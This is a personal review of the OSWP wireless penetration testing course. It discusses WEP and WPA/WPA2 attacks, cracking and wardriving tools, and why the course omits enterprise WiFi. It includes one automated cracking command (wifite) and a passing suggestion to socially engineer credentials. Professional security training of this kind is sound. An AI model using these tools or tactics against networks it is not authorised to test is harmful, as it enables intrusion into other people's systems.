This is my review of the OSWP course material. I passed this certification in late 2019.
The Offensive Security Wireless Professional is a certification course and exam that tests your knowledge around wireless penetration testing. Offensive Security is easily my favorite certification vendor simply because of their exam approach. The entirely practical exam means that you don’t pass unless you can actually attack and gain access to their wireless networks. In this case, you receive SSH access to an attacker machine with nearby wireless networks. You pass by successfully compromising the wireless networks.
What I’ll be covering
- General Structure
- Inner workings of Wifi
- Example PCAPs
- More WEP
- OMG WEP
- WPA / WPA2
- Attacking WPA/2
- Mass attacking tools
- Wardriving tools
- Precompling tools – CPU and GPU
- Other exercises
- Enterprise Authentication
- And the lack thereof
- Why you should be okay with this
For the uninitiated, Offensive Security will provide course materials to you once you register for the course. This includes a PDF of their course work that should be considered a text book, as well as a lab guide. In addition, you’ll be provided with videos to correspond with the materials. Finally, for this course they’ll provide you with an ISO of the attacking VM that they suggest using.
It’s worth noting, that the VM they provide is quite outdated. It works perfectly well, and won’t hinder you at all for the course or beyond, meaning you’ll still be able to apply all of your knowledge to a shiny new VM as well. Still, the general stigma around OffSec is that they need some updating, so this doesn’t help.
The course materials really start with a foundation of “how Wifi works” which I thought was fantastic. After years of SysAdmin work, and a dozen other industry certifications, this was the first textbook that actually talked about the structure of a wireless packet. For the first time in my career, I felt like I actually knew what was happening over the air. It shouldn’t be up to the OSWP to provide this knowledge, but this fundamental understanding of the traffic is absolutely crucial to feeling comfortable and confident that you know what your attacks are doing.
The structure of APs and Clients and the communications they perform are clearly laid out, each with a matching PCAP file that’s been filtered down to show only the needed information. Specific packet details are called out in each PCAP gradually. At the end you can tell what you’re looking at, even if you’re unfamiliar with the flag being set in a particular section of the packet.
WEP – So Much WEP
Then the materials get into actual attacks, starting with WEP networks. And why not? WEP is easily bypassed and riddled with various ways to accomplish our goal.
And after a little about WEP, they move on into WEP with clients vs without clients.
And then WEP with various techniques.
And you begin wondering if they will ever teach you anything else.
The WEP section of the materials easily makes up for 60% of the coursework.
This can be really disappointing.
As somebody that always tries to see both sides of view, I really try to justify this. After all, you’ve just received the crucial and vitally important fundamental knowledge about how WiFi is supposed to work, it should be just as valuable to understand how it fails. It should be.
The reality is, it just sucks. Any modern wifi attack toolkit will fully automate WEP attacks. While it’s great to understand it, I’m never going to execute it manually. Ever. It’s presence in 2020 is far and few between. The WEP portion of this material needs to be trimmed.
That said, you WILL know how to attack it. You’ll set up a few different scenarios in your lab and go through each. You’ll know it inside and out. There is something to be said for that.
You’ll also just type wifite -i wlan0 and never think about it again.
WPA and WPA2
After all that nonsense, you’ll be excited to step into the WPA/2 sections. The WEP sections satisfy a deeply technical knowledge that you don’t get the same way in WPA based networks. Although you’ll get an understanding of the design of these systems, you’ll quickly learn that your attack surface is quite different.
You’ll cover the same concepts, review some PCAPs of the traffic and setup some labs to attack. The biggest difference is that you’ll find these attacks to a lot more passive. In fact, they’re so passive that it almost leaves you wanting more WEP like material, but for WPA/2 of course.
In my opinion, the modern wireless encryption standards have seen more “one-off” exploits and the course materials could benefit from sharing some of those.
The same way you would be remiss from excluding ShellShock or Drupalgeddon from a PenTest crash course, it seems that a few exploits are worth highlighting. I’m thinking along the lines of routers where WPS PINS were quickly and easily bypassed, or the more recent Krook based attacks. Attacks like these come and go as the firmware is updated, but I think it would be a nice addition to the material.
In addition to the WPA/2 based attack options, the OSWP dives into some toolkits that might be useful throughout your wireless auditing. I think they do a really good job covering a lot of bases that I wouldn’t have asked for, but I’m glad I know about.
This included tools like cowPatty or Pyrit to precompute SSID and password possibilities using your GPU. It included Kismet and plugins to introduce the concepts of wardriving and taking actual useful data out of it. It included passively decrypting traffic for an IDS feed. The entire aircrack suite is covered.
Although technically, none of that is specific to WPA/2, I had placed that entire section within the WPA knowledge in my head, primarily because it was all relevant and useful knowledge.
Those additions to the course exceeded my expectations. While I expected to be able to attack wireless, I had not really anticipated the variety of toolkits that would aid me in a SOC style of value.
When I came towards the end of the material, I was suprised to see that there was NO material focused on attacking WPA Enterprise networks. This was disappointing…
… Until I put an ounce of thought into it…
If you’re taking the course, you understand attacking the PSK (PreShared Key). With Enterprise, the password (and username) you’re looking for aren’t actually negotiated by the AP. This is in your materials as well, where it highlights the communication between the AP and the authentication server. If you want these credentials, you need to get them from the back end system, which is almost always going to be Active Directory.
If you want to connect to WPA-PSK, attack the PSK. If you want to connect to WPA-Enterprise, attack the enterprise.
Under that context, it’s a little easier to see why there isn’t anything in the materials on attacking it. Do you expect that you’ll be able to reverse the ciphertext of the certificate based authentication? or would it be easier to get Initial Access to the company by a different means?
If they’re using AD Username and Password for the Enterprise Authentication, then it would be far easier to social engineer a username and password out of a person who likes to click emails vs. actually attempting to attack the Enterprise authentication process exclusively from the wireless.
In my own personal opinion, it can be perceived that Enterprise might be LESS secure than PSK, simply because your wireless is only as secure as the least-secure minded employee. Username and “Summer20” is a pretty terrible wireless protection. Good enterprise security would include good logging and employee awareness. Certificate based auth would be better, but I think a lot of IT departments are scared off by that. As a result, the easier thing to implement is a good PSK, which the average IT person or IT department can properly secure quickly and easily.
Is it worth it?
Yes – I think it’s a small price to pay for wireless attack knowledge and you’ll definitely walk away with your value
Would I recommend it?
Yes – Anybody considering it probably already knows enough about what they’re getting into that they’ll be happy they did it.
Do I think you’ll be disappointed?
Yes – The common complaint with OffSec is the outdated material, and this is no exception. Despite this, the quality of their material is still high enough for it to be overlooked, and still considered valuable.
Overall, I can confidently attack wireless and know I’ll get it if there is a chance to get in. I would add that any home or SOHO router is basically easily bypassed after a small amount of review because of predictable passwords and OSINT. Businesses make the same mistakes- find that predictable password and you can generally get in.
Offsec gets asked frequently if they’re going to update the material. OSCP has seen significant adds to the material this year, and that’s more of their flagship cert than this one, but it’s a good sign for them. I would personally like to see a little less on WEP. The history is important, and the foundational knowledge is necessary to execute the other attacks with confidence, but all modern wifi attack tools have fully automated WEP cracking and eliminate the need for any WEP knowledge. By shaving down that material, additional techniques around WPA/ WPA2 could be discussed, like specific exploits (Krook, Reaver based attacks) . In addition, a small amount of discussion around Enterprise might be good add.